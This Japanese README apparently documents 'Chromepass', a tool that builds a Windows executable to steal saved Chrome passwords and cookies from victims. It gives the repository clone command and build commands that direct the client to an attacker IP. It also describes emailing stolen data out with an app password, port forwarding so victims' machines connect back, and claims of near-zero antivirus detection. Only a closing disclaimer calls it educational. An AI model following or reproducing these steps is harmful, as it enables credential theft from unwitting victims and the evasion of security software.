
Chromepass - Chromeに保存されたパスワードをハッキング
ChromepassはPythonベースのコンソールアプリケーションで、以下の機能を持つWindows実行可能ファイルを生成します。
新しいクライアントビルド手法により、AV回避戦術を使わなくても実質的に検出率0%が保証されます。将来的にこれが成立しなくなった場合、AV回避を改善するためのいくつかの方法が実装される予定です。
直近のスキャン例(注:10〜12時間以内に0〜2件の検出から32件の検出に増加するため、自身のビルドで分析を実行してください):
これは非常にシンプルなアプリケーションで、次のものだけを使用します:
インストールはWindows VM内で実行することを推奨します。インストール手順の一部は既存の設定の影響を受ける可能性があります。これはクリーンなWindows 10 VMでテストされています。
ChromepassのコンパイルにはWindowsが必要です!LinuxとmacOSのサポートは近日追加予定です。
git clone https://github.com/darkarp/chromepass
注:リポジトリのクローンに代えて、最新リリースをダウンロードすることもできます。リポジトリはバグが多い可能性があります。
依存関係は自動的に確認されインストールされるため、使い方にスキップして構いません。競合がないことを確認するために、クリーンなVMを使用することを推奨します。
依存関係がなくインターネットが遅い場合、時間がかかります。コーヒーでも飲んでお待ちください。
Chromepassは非常に簡単です。まず次のコマンドを実行します:
python create.py -h
オプションのリストが表示され、説明は一目瞭然です。
パラメータなしで実行すると、127.0.0.1に接続するサーバーとクライアントがビルドされます。
ビルドの簡単な例:
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'
サーバーとクライアントを作成したら、クライアント実行時にサーバーが実行されていることを確認してください。
Cookieとパスワードは、サーバーと同じディレクトリにあるdataという新しいフォルダに、IPアドレスごとに分けられたjsonファイルとして保存されます。
Chromepassは実験的ではありますが、メール経由でのファイル送信をサポートしています。これを有効にするには、サーバー作成時に--emailフラグを使用します。必要なものは2つ:ユーザー名(メールアドレス)とパスワード(アプリパスワード)です。
アプリパスワードを生成するには、アカウント設定 -> セキュリティに進み、2段階認証を有効にする必要があります(必須!)
2段階認証を有効にすると、アプリパスワードという新しいオプションが表示されます:

生成をクリックすると、必要なパスワードが表示されます。

ユーザー名とパスワードはコマンドで直接使用するか、config.iniファイル内のYOUR_USERNAME、YOUR_PASSWORDと書かれた場所に記述することもできます。
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh
python create.py --error --message 'An Error has happened' --email
リモートで使用する場合は、ポートフォワーディング(デフォルトはポート80)も行う必要があります。これにより、被害者がクライアントを実行したときに、正しいポートでサーバーに接続できるようになります。
一般的な情報については、こちらをクリックしてください。それでも不十分な場合は、Google検索を行ってください。
自動セットアップは実験的です。何らかの理由で正しく依存関係をインストールできない場合があります。その場合は手動でインストールする必要があります。
幸いなことに、依存関係は2つだけです:
ビルドツールの代わりにVisual Studioをインストールすることもできますが、より多くの容量を必要とします。
ビルドツールのインストールが成功したら、Rustupのウェブサイトからrustup-init.exeを実行するだけです。
これで必要な依存関係のインストールが完了し、すぐに使用できるはずです。
エラーやバグを見つけた場合は、Issueとして報告してください。機能や改善を提案したい場合は、Issueページで報告してください。
Issue作成時に表示されるテンプレートに従ってください。
完全な初心者から熟練のベテランまで、意欲的なコンピュータセキュリティの専門家で構成されるコミュニティに参加するには、Discordサーバーに参加してください:WhiteHat Hacking
連絡を取りたい場合は、次のメールアドレスから連絡できます:[email protected]
提供された情報とコードを使用して行うことについて、私は一切の責任を負いません。これは専門的または教育的目的のためのみに意図されています。
